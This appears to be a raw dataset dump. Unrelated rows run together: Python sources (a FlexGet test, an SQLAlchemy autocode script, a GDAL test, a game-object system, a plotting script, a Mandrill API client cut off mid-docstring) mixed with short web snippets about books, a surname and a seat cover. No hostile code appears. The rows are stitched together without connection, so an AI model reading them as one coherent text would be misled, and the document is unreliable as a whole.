text
stringlengths
29
850k
from __future__ import unicode_literals, division, absolute_import

from mock import patch, call

from tests import FlexGetBase
import flexget.plugins.input.betaseries_list


def assert_mock_calls(expected_calls, mock_object):
    """Fail unless `mock_object` recorded exactly `expected_calls`, in order."""
    assert expected_calls == mock_object.mock_calls, "expecting calls %r, got %r instead" % \
        (expected_calls, mock_object.mock_calls)


def assert_series_count_in_db(expected_count):
    """Fail unless the Series table holds exactly `expected_count` rows."""
    from flexget.plugins.filter.series import Series
    from flexget.manager import Session
    session = Session()
    actual_series_count = session.query(Series).count()
    assert expected_count == actual_series_count, "expecting %s series stored in db, got %s instead" % \
        (expected_count, actual_series_count)


class Test_import_series_betaseries_list(FlexGetBase):
    """End-to-end tests for the betaseries_list input plugin.

    The betaseries HTTP helpers (create_token / query_series) are mocked so
    no network traffic happens; the tests assert both the calls made to the
    API helpers and the number of series that end up in the database.
    """

    __yaml__ = """
        tasks:
          test_no_members:
            configure_series:
              from:
                betaseries_list:
                  username: user_foo
                  password: passwd_foo
                  api_key: api_key_foo

          test_with_one_members:
            configure_series:
              from:
                betaseries_list:
                  username: user_foo
                  password: passwd_foo
                  api_key: api_key_foo
                  members:
                    - other_member_1

          test_with_two_members:
            configure_series:
              from:
                betaseries_list:
                  username: user_foo
                  password: passwd_foo
                  api_key: api_key_foo
                  members:
                    - other_member_1
                    - other_member_2
    """

    def setup(self):
        super(Test_import_series_betaseries_list, self).setup()
        # Mock create_token so no real authentication request is made.
        self.create_token_patcher = patch.object(
            flexget.plugins.input.betaseries_list, "create_token",
            return_value='token_foo')
        self.create_token_mock = self.create_token_patcher.start()
        # Mock query_series; individual tests override return_value/side_effect.
        self.query_series_patcher = patch.object(
            flexget.plugins.input.betaseries_list, "query_series",
            return_value=[])
        self.query_series_mock = self.query_series_patcher.start()

    def teardown(self):
        super(Test_import_series_betaseries_list, self).teardown()
        self.create_token_patcher.stop()
        self.query_series_patcher.stop()

    def test_no_members(self):
        # GIVEN
        self.query_series_mock.return_value = ["Breaking Bad", "Dexter"]
        # WHEN
        self.execute_task('test_no_members')
        # THEN
        assert_series_count_in_db(2)
        assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
        assert_mock_calls([call('api_key_foo', 'token_foo', 'user_foo')], self.query_series_mock)

    def test_with_one_members(self):
        # GIVEN
        self.query_series_mock.return_value = ["Breaking Bad", "Dexter", "The Simpsons"]
        # WHEN
        self.execute_task('test_with_one_members')
        # THEN
        assert_series_count_in_db(3)
        assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
        assert_mock_calls([call('api_key_foo', 'token_foo', 'other_member_1')], self.query_series_mock)

    def test_with_two_members(self):
        # GIVEN
        # One distinct result list per configured member, in call order.
        # BUG FIX: the original used `generator.next()`, which exists only on
        # Python 2; the builtin next() works on Python 2.6+ and 3.
        return_values_generator = iter([
            ["Family guy", "The Simpsons"],
            ["Breaking Bad", "Dexter", "The Simpsons"],
        ])
        self.query_series_mock.side_effect = lambda *args: next(return_values_generator)
        # WHEN
        self.execute_task('test_with_two_members')
        # THEN
        assert_series_count_in_db(4)  # "The Simpsons" overlaps, so 4 unique
        assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
        assert_mock_calls(
            [
                call('api_key_foo', 'token_foo', 'other_member_1'),
                call('api_key_foo', 'token_foo', 'other_member_2')
            ],
            self.query_series_mock)
These are the last remaining works by Jean Delerens. Jean Delerens doesn’t have any exhibitions. Follow Jean Delerens to receive a notification as soon as new exhibitions are added.
# autocode.py
#
# Author(s): Christophe de Vienne <cdevienne@gmail.com>
#            Paul Johnson
#
# Based on autocode.py by Paul Johnson
# (http://www.sqlalchemy.org/trac/wiki/UsageRecipes/AutoCode)
#
# Improvements over the original autocode.py:
# * Takes arguments on the command line to select the dburl and
#   the output destination
# * Replace a bunch of database specific types by generic ones.
#   This is incomplete as it fits only my needs for a mysql to mssql
#   database conversion.
# * Output the indexes and ForeignKeyConstraints (including multi-columns
#   ones) correctly
#
# The resulting script is directly usable (ie import and create/use the tables)
# with my testing database (a legacy mysql db with about 140+ tables, 140+
# foreign keys, 170+ indexes), after applying patches
# http://www.sqlalchemy.org/trac/ticket/662 and
# http://www.sqlalchemy.org/trac/ticket/663 on a 0.3.9 release.
#

from sqlalchemy import *
from sqlalchemy.databases import information_schema

import string
import sys

from optparse import OptionParser

parser = OptionParser("usage: %prog [options] dburl")
parser.add_option('--output', '-o', action='store', dest='output',
                  metavar='FILE', default='stdout',
                  help='Write the result into FILE (default "stdout")')

(options, args) = parser.parse_args()

if len(args) != 1:
    # BUG FIX: message read "Wrong number or arguments".
    parser.error('Wrong number of arguments')

dburl = engine.url.make_url(args[0])
db = create_engine(dburl)
metadata = BoundMetaData(db)

if options.output == 'stdout':
    output = sys.stdout
else:
    output = open(options.output, 'w')


def textclause_repr(self):
    """repr a text clause as a text(...) constructor call."""
    return 'text(%s)' % repr(self.text)


def table_repr(self):
    """repr a Table as a Table(...) constructor call (PK constraint omitted,
    since primary_key is already emitted on the columns)."""
    return "Table(%s)" % ",\n    ".join(
        [repr(self.name)] +
        [repr(self.metadata)] +
        [repr(x) for x in self.columns] +
        [repr(x) for x in self.constraints
         if not isinstance(x, PrimaryKeyConstraint)]
    )


def column_repr(self):
    """repr a Column, emitting only the keyword args that differ from the
    defaults (key, primary_key, nullable, onupdate, default)."""
    kwarg = []
    if self.key != self.name:
        kwarg.append('key')
    if self._primary_key:
        kwarg.append('primary_key')
    if not self.nullable:
        kwarg.append('nullable')
    if self.onupdate:
        kwarg.append('onupdate')
    if self.default:
        kwarg.append('default')
    return "Column(%s)" % ', '.join(
        [repr(self.name)] +
        [repr(self.type)] +
        [repr(x) for x in self.constraints] +
        ["%s=%s" % (k, repr(getattr(self, k))) for k in kwarg]
    )


def foreignkeyconstraint_repr(self):
    """repr a ForeignKeyConstraint, including multi-column constraints."""
    return "ForeignKeyConstraint(%s)" % ', '.join(
        [
            repr([x.parent.name for x in self.elements]),
            repr([x._get_colspec() for x in self.elements]),
            'name=' + repr(self.name)
        ]
    )


def repr_index(index, tvarname):
    """repr an Index against the table variable named `tvarname`."""
    return "Index(%s)" % ", ".join(
        [repr(index.name)] +
        ["%s.c.%s" % (tvarname, c.name) for c in index.columns] +
        ['unique=' + repr(index.unique)])


# Monkey-patch repr so that repr(Table) produces runnable source code.
sql._TextClause.__repr__ = textclause_repr
schema.Table.__repr__ = table_repr
schema.Column.__repr__ = column_repr
schema.ForeignKeyConstraint.__repr__ = foreignkeyconstraint_repr

# NOTE: use a dedicated name for the query so we do not shadow the
# `sql` module whose class was patched above.
tables_query = select(
    [information_schema.tables.c.table_name,
     information_schema.tables.c.table_schema],
    information_schema.tables.c.table_schema == dburl.database)

output.write("""from sqlalchemy import *

metadata = MetaData()
""")

# Mapping of backend-specific type names to generic ones.  Order matters:
# 'MSSmallInteger(length=1)' must be tried before 'MSSmallInteger', and
# 'MSDateTime' before 'MSDate'/'MSTime'.
# (The original listed 'MSMediumText' twice; the duplicate is dropped.)
TYPE_REPLACEMENTS = [
    ('BoundMetaData()', 'metadata'),
    ('MSChar', 'CHAR'),
    ('MSSmallInteger(length=1)', 'Boolean()'),
    ('MSSmallInteger', 'SmallInteger'),
    ('MSDateTime', 'DateTime'),
    ('MSMediumText', 'TEXT'),
    ('MSDouble', 'Numeric'),
    ('MSLongBlob', 'TEXT'),
    ('MSString', 'String'),
    ('MSDate', 'Date'),
    ('MSTime', 'DateTime'),
    ('MSInteger', 'Integer'),
    ('MSDecimal', 'Numeric'),
    ('MSEnum', 'Integer'),
]

tname_list = []
# NOTE: loop variable renamed from `schema` so it no longer shadows the
# sqlalchemy `schema` module used above.
for tname, table_schema in db.execute(tables_query):
    if table_schema != dburl.database:
        continue
    tname_list.append(tname)
    tbl = Table(tname, metadata, schema=table_schema, autoload=True)
    code = repr(tbl)
    for old, new in TYPE_REPLACEMENTS:
        code = code.replace(old, new)
    indexes = "\n".join(
        repr_index(index, tname) for index in tbl.indexes)
    output.write("""
%s = %s
%s
""" % (tname, code, indexes))

# vim: expandtab tabstop=4 shiftwidth=4:
This is the fifth post from an 8-week cycle drawing excerpts from my book, The Monk’s Cell: Ritual and Knowledge in American Contemplative Christianity (Oxford University Press, 2018). Chapters five, six, and seven work together as a kind of Triduum (the three-day rite of Easter, beginning with Maundy Thursday, following with Good Friday, and concluding with the Easter Vigil). Continuing with the series of excerpts from The Monk’s Cell: Ritual and Knowledge in American Contemplative Christianity (Oxford University Press, 2018), the fourth chapter, Gate, describes the charismatic appeal of teachers and diversity within the American contemplative Christianity movement. Exploring the limits of variability in this dynamic, open-minded movement, the chapter compares the distinctive ethos - penitence and eros - of monastic and Wisdom rites for Holy Week. The Monk’s Cell’s chapters are modeled on an architectural metaphor for “deepening into the divine,” similar to Teresa of Ávila’s Interior Castle. The first chapter, Portico, describes how longing for the divine draws people to contemplative Christianity. Our Kamloops contemplative group has evolved through several incarnations over the years. Initially we were simply four people in our local parish who were getting together weekly to share our stories and to “pray”. That was some twenty-five years ago. A Christmas farewell from the administrator, Miranda Harvey.
#!/usr/bin/python # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """This script outputs the filenames of the files that are in the "packages/" subdir of the given directory, relative to that directory.""" import argparse import os import sys def main(target_directory): os.chdir(target_directory) for root, _, files in os.walk("packages", followlinks=True): for f in files: print os.path.join(root, f) if __name__ == '__main__': parser = argparse.ArgumentParser( description="List filenames of files in the packages/ subdir of the " "given directory.") parser.add_argument("--target-directory", dest="target_directory", metavar="<target-directory>", type=str, required=True, help="The target directory, specified relative to this " "directory.") args = parser.parse_args() sys.exit(main(args.target_directory))
This gives employers greater flexibility and a way to cover labour shortages for particular jobs or for a short period.
#!/usr/bin/env python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a complete rewrite of a file licensed as follows:
#
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.

"""Test geolocation warper.

Rewrite of:

http://trac.osgeo.org/gdal/browser/trunk/autotest/gcore/geoloc.py
"""

import contextlib
import os
import unittest

from osgeo import gdal

from autotest2.gcore import gcore_util
from autotest2.gdrivers import gdrivers_util

EXT = '.vrt'


@contextlib.contextmanager
def PushDir(path):
  """Temporarily change the working directory to `path`.

  BUG FIX: the original did not restore the working directory when the body
  of the with-statement raised; the restore now lives in a finally clause so
  the cwd is always put back.
  """
  orig_path = os.getcwd()
  os.chdir(path)
  try:
    yield
  finally:
    os.chdir(orig_path)


@gdrivers_util.SkipIfDriverMissing(gdrivers_util.VRT_DRIVER)
@gdrivers_util.SkipIfDriverMissing(gdrivers_util.GTIFF_DRIVER)
class GeolocTest(gdrivers_util.DriverTestCase):

  def setUp(self):
    super(GeolocTest, self).setUp(gdrivers_util.VRT_DRIVER, EXT)

  def testGeoloc01WarpSst(self):
    # The VRT references relative paths, so open it from its own directory.
    filepath = gcore_util.GetTestFilePath('warpsst.vrt')
    with PushDir(os.path.dirname(filepath)):
      self.CheckOpen(filepath)
      self.CheckGeoTransform((-90.30271148, 0.15466423, 0,
                              33.87552642, 0, -0.15466423))
      # TODO(schwehr): The changing checksum of the band with GDAL updates
      # implies that this test is brittle and needs to be reworked.
      self.CheckBand(1, 62319, gdal.GDT_Int16)


if __name__ == '__main__':
  unittest.main()
Lucky in Love fits into both of those categories perfectly.
from components.component import valid_components


class GameObject(object):
    """Container of components with message/query dispatch between them."""

    def __init__(self):
        self.components = {}   # component NAME -> component instance
        self.observers = {}    # message_type -> [(observer, callback)]
        self.responders = {}   # query_type -> [(responder, callback)]

    def copy_to(self, new_game_object):
        """Register a copy of each of our components on `new_game_object`."""
        for component in self.components.values():
            new_game_object.register_component(component.copy())
        return new_game_object

    def get_component(self, component_name):
        """Return the named component, or None if it is not registered."""
        return self.components.get(component_name, None)

    def update(self):
        """Tick every registered component."""
        for component in self.components.values():
            component.update()

    def transmit_message(self, sender, message_type, **kwargs):
        """Deliver a message to every observer of `message_type` except `sender`."""
        if message_type in self.observers:
            for observer, func in self.observers[message_type]:
                if observer != sender:
                    func(**kwargs)

    def transmit_query(self, sender, query_type, **kwargs):
        """Collect responses from every responder of `query_type` except `sender`."""
        responses = []
        if query_type in self.responders:
            for responder, func in self.responders[query_type]:
                if responder != sender:
                    responses.append(func(**kwargs))
        return responses

    def register_observer(self, observer, message_type, func):
        """Subscribe `func` (owned by `observer`) to `message_type`."""
        if message_type not in self.observers:
            self.observers[message_type] = []
        # BUG FIX: the original tested `func not in <list of tuples>`, which
        # compares a function against (observer, func) tuples and never
        # matches, so the duplicate guard was dead code.  Test the tuple.
        if (observer, func) not in self.observers[message_type]:
            self.observers[message_type].append((observer, func))

    def register_query_responder(self, responder, query_type, func):
        """Subscribe `func` (owned by `responder`) to `query_type`."""
        if query_type not in self.responders:
            self.responders[query_type] = []
        # BUG FIX: same dead duplicate guard as register_observer.
        if (responder, func) not in self.responders[query_type]:
            self.responders[query_type].append((responder, func))

    def register_component(self, component):
        """Attach a component; an existing component of the same NAME is replaced."""
        if component.NAME in self.components:
            self.unregister_component(component)
        self.components[component.NAME] = component
        component.on_register(self)

    def unregister_component(self, component):
        """Detach a component by NAME, notifying it first; no-op if absent."""
        if component.NAME in self.components:
            component.on_unregister()
            del self.components[component.NAME]

    def __getattr__(self, item):
        # Allow `obj.some_component` attribute access for known component
        # names; a missing-but-valid component yields a falsy NoneVoid.
        if item in valid_components:
            component = self.get_component(item)
            if component:
                return component
            return NoneVoid()
        # BUG FIX: include the attribute name so the error is debuggable.
        raise AttributeError(item)


class NoneVoid(object):
    """Falsy null-object returned for valid-but-absent components.

    This class's only purpose is to Falsify any other calls made to get
    attributes from it.  It allows us to duck type into components a little
    easier.
    """

    def __getattr__(self, item):
        return None

    def __bool__(self):
        return False

    # BUG FIX: Python 2 ignores __bool__ and uses __nonzero__; alias it so
    # the object is actually falsy on both major versions.
    __nonzero__ = __bool__
Know a Keene? What are his siblings named? Keene is an English surname, from an Old English personal name meaning "proud/brave." It is separate in origin from the Irish Gaelic name Cian/Keane ("ancient/legendary"). How does Keene sound to you?
#!/usr/bin/env python
"""Plot feedback-controller input blended with user input at five trust levels.

Reads time/config/command logs from YAML files in the current directory and
plots two base-joint-angle columns against time.
"""

import numpy as np
import pylab
import yaml


def _load_yaml(path):
    """Parse a YAML file and return its contents.

    BUG FIX: the original used the Python-2-only `file()` builtin and never
    closed the handle on error; it also used yaml.load(), which can execute
    arbitrary tags -- safe_load is the safe equivalent for plain data.
    """
    with open(path, 'r') as stream:
        return yaml.safe_load(stream)


def _replace_nans(log, label):
    """Replace every NaN in a 3-level nested list with 0, in place."""
    for i in range(len(log)):
        for j in range(len(log[i])):
            for k in range(len(log[i][j])):
                if np.isnan(log[i][j][k]):
                    print("%s NaN found and replaced" % label)
                    log[i][j][k] = 0


TIME_LOG = _load_yaml('time.yaml')
time2, time4, time6, time8, time10 = (TIME_LOG[i] for i in range(1, 6))

CONFIG_LOG = _load_yaml('config.yaml')
_replace_nans(CONFIG_LOG, "Config")
config2, config4, config6, config8, config10 = (
    np.asanyarray(CONFIG_LOG[i]) for i in range(1, 6))

# NOTE: the command arrays are loaded and cleaned but never plotted; kept
# for parity with the original script's side effects (NaN warnings).
COMMAND_LOG = _load_yaml('command.yaml')
_replace_nans(COMMAND_LOG, "Command")
command2, command4, command6, command8, command10 = (
    np.asanyarray(COMMAND_LOG[i]) for i in range(1, 6))

TRUST_LABELS = ["Trust 0.2", "Trust 0.4", "Trust 0.6",
                "Trust 0.8", "Trust 1.0"]
LINE_COLORS = ['red', 'orange', 'yellow', 'green', 'blue']  # roygbiv subset

_times = [time2, time4, time6, time8, time10]
_configs = [config2, config4, config6, config8, config10]


def _plot_joint(times, configs, column):
    """Plot one joint-angle column for every trust level on the current axes."""
    lines = []
    for t, c, color in zip(times, configs, LINE_COLORS):
        line, = pylab.plot(t, c[:, column])
        pylab.setp(line, linewidth=3, color=color)
        lines.append(line)
    # Mark the handover instant at t = 1.0 s.
    pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray")
    pylab.legend(lines, TRUST_LABELS)


ax1 = pylab.subplot(211)
_plot_joint(_times, _configs, 0)
pylab.title("Feedback Controller Input Blended with User Input "
            "at Different Levels of Trust")
pylab.ylabel("Base Joint Angle about X-axis (radians)")

ax2 = pylab.subplot(212, sharex=ax1)
_plot_joint(_times, _configs, 1)
pylab.xlabel("Time (sec)")
pylab.ylabel("Base Joint Angle about Y-axis (radians)")

pylab.show()
This seat cover places a natural barrier between your skin and the toilet seat and helps reduce the passing of germs, bacteria, and viruses, keeping you and your children healthier — especially in dirty public restrooms and bathrooms when you are travelling with your family.
import requests, os.path, logging, sys, time try: import ujson as json except ImportError: try: import simplejson as json except ImportError: import json class Error(Exception): pass class ValidationError(Error): pass class InvalidKeyError(Error): pass class PaymentRequiredError(Error): pass class UnknownSubaccountError(Error): pass class UnknownTemplateError(Error): pass class ServiceUnavailableError(Error): pass class UnknownMessageError(Error): pass class InvalidTagNameError(Error): pass class InvalidRejectError(Error): pass class UnknownSenderError(Error): pass class UnknownUrlError(Error): pass class UnknownTrackingDomainError(Error): pass class InvalidTemplateError(Error): pass class UnknownWebhookError(Error): pass class UnknownInboundDomainError(Error): pass class UnknownInboundRouteError(Error): pass class UnknownExportError(Error): pass class IPProvisionLimitError(Error): pass class UnknownPoolError(Error): pass class NoSendingHistoryError(Error): pass class PoorReputationError(Error): pass class UnknownIPError(Error): pass class InvalidEmptyDefaultPoolError(Error): pass class InvalidDeleteDefaultPoolError(Error): pass class InvalidDeleteNonEmptyPoolError(Error): pass class InvalidCustomDNSError(Error): pass class InvalidCustomDNSPendingError(Error): pass class MetadataFieldLimitError(Error): pass class UnknownMetadataFieldError(Error): pass ROOT = 'https://mandrillapp.com/api/1.0/' ERROR_MAP = { 'ValidationError': ValidationError, 'Invalid_Key': InvalidKeyError, 'PaymentRequired': PaymentRequiredError, 'Unknown_Subaccount': UnknownSubaccountError, 'Unknown_Template': UnknownTemplateError, 'ServiceUnavailable': ServiceUnavailableError, 'Unknown_Message': UnknownMessageError, 'Invalid_Tag_Name': InvalidTagNameError, 'Invalid_Reject': InvalidRejectError, 'Unknown_Sender': UnknownSenderError, 'Unknown_Url': UnknownUrlError, 'Unknown_TrackingDomain': UnknownTrackingDomainError, 'Invalid_Template': InvalidTemplateError, 'Unknown_Webhook': UnknownWebhookError, 
'Unknown_InboundDomain': UnknownInboundDomainError, 'Unknown_InboundRoute': UnknownInboundRouteError, 'Unknown_Export': UnknownExportError, 'IP_ProvisionLimit': IPProvisionLimitError, 'Unknown_Pool': UnknownPoolError, 'NoSendingHistory': NoSendingHistoryError, 'PoorReputation': PoorReputationError, 'Unknown_IP': UnknownIPError, 'Invalid_EmptyDefaultPool': InvalidEmptyDefaultPoolError, 'Invalid_DeleteDefaultPool': InvalidDeleteDefaultPoolError, 'Invalid_DeleteNonEmptyPool': InvalidDeleteNonEmptyPoolError, 'Invalid_CustomDNS': InvalidCustomDNSError, 'Invalid_CustomDNSPending': InvalidCustomDNSPendingError, 'Metadata_FieldLimit': MetadataFieldLimitError, 'Unknown_MetadataField': UnknownMetadataFieldError } logger = logging.getLogger('mandrill') logger.setLevel(logging.INFO) logger.addHandler(logging.StreamHandler(sys.stderr)) class Mandrill(object): def __init__(self, apikey=None, debug=False): '''Initialize the API client Args: apikey (str|None): provide your Mandrill API key. If this is left as None, we will attempt to get the API key from the following locations:: - MANDRILL_APIKEY in the environment vars - ~/.mandrill.key for the user executing the script - /etc/mandrill.key debug (bool): set to True to log all the request and response information to the "mandrill" logger at the INFO level. When set to false, it will log at the DEBUG level. 
By default it will write log entries to STDERR ''' self.session = requests.session() if debug: self.level = logging.INFO else: self.level = logging.DEBUG self.last_request = None if apikey is None: if 'MANDRILL_APIKEY' in os.environ: apikey = os.environ['MANDRILL_APIKEY'] else: apikey = self.read_configs() if apikey is None: raise Error('You must provide a Mandrill API key') self.apikey = apikey self.templates = Templates(self) self.exports = Exports(self) self.users = Users(self) self.rejects = Rejects(self) self.inbound = Inbound(self) self.tags = Tags(self) self.messages = Messages(self) self.whitelists = Whitelists(self) self.ips = Ips(self) self.internal = Internal(self) self.subaccounts = Subaccounts(self) self.urls = Urls(self) self.webhooks = Webhooks(self) self.senders = Senders(self) self.metadata = Metadata(self) def call(self, url, params=None): '''Actually make the API call with the given params - this should only be called by the namespace methods - use the helpers in regular usage like m.tags.list()''' if params is None: params = {} params['key'] = self.apikey params = json.dumps(params) self.log('POST to %s%s.json: %s' % (ROOT, url, params)) start = time.time() r = self.session.post('%s%s.json' % (ROOT, url), data=params, headers={'content-type': 'application/json', 'user-agent': 'Mandrill-Python/1.0.55'}) try: remote_addr = r.raw._original_response.fp._sock.getpeername() # grab the remote_addr before grabbing the text since the socket will go away except: remote_addr = (None, None) #we use two private fields when getting the remote_addr, so be a little robust against errors response_body = r.text complete_time = time.time() - start self.log('Received %s in %.2fms: %s' % (r.status_code, complete_time * 1000, r.text)) self.last_request = {'url': url, 'request_body': params, 'response_body': r.text, 'remote_addr': remote_addr, 'response': r, 'time': complete_time} result = json.loads(response_body) if r.status_code != requests.codes.ok: raise 
self.cast_error(result) return result def cast_error(self, result): '''Take a result representing an error and cast it to a specific exception if possible (use a generic mandrill.Error exception for unknown cases)''' if not 'status' in result or result['status'] != 'error' or not 'name' in result: raise Error('We received an unexpected error: %r' % result) if result['name'] in ERROR_MAP: return ERROR_MAP[result['name']](result['message']) return Error(result['message']) def read_configs(self): '''Try to read the API key from a series of files if it's not provided in code''' paths = [os.path.expanduser('~/.mandrill.key'), '/etc/mandrill.key'] for path in paths: try: f = open(path, 'r') apikey = f.read().strip() f.close() if apikey != '': return apikey except: pass return None def log(self, *args, **kwargs): '''Proxy access to the mandrill logger, changing the level based on the debug setting''' logger.log(self.level, *args, **kwargs) def __repr__(self): return '<Mandrill %s>' % self.apikey class Templates(object): def __init__(self, master): self.master = master def add(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=[]): """Add a new template Args: name (string): the name for the new template - must be unique from_email (string): a default sending address for emails sent using this template from_name (string): a default from name to be used subject (string): a default subject line to be used code (string): the HTML code for the template with mc:edit attributes for the editable elements text (string): a default text part to be used when sending with this template publish (boolean): set to false to add a draft template without publishing labels (array): an optional array of up to 10 labels to use for filtering templates:: labels[] (string): a single label Returns: struct. 
the information saved about the new template:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidTemplateError: The given template name already exists or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name, 'from_email': 
from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels} return self.master.call('templates/add', _params) def info(self, name): """Get the information for an existing template Args: name (string): the immutable name of an existing template Returns: struct. the requested template information:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last 
modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/info', _params) def update(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=None): """Update the code for an existing template. If null is provided for any fields, the values will remain unchanged. Args: name (string): the immutable name of an existing template from_email (string): the new default sending address from_name (string): the new default from name subject (string): the new default subject line code (string): the new code for the template text (string): the new default text part to be used publish (boolean): set to false to update the draft version of the template without publishing labels (array): an optional array of up to 10 labels to use for filtering templates:: labels[] (string): a single label Returns: struct. 
the template that was updated:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': 
subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels} return self.master.call('templates/update', _params) def publish(self, name): """Publish the content for the template. Any new messages sent using this template will start using the content that was previously in draft. Args: name (string): the immutable name of an existing template Returns: struct. the template that was published:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at 
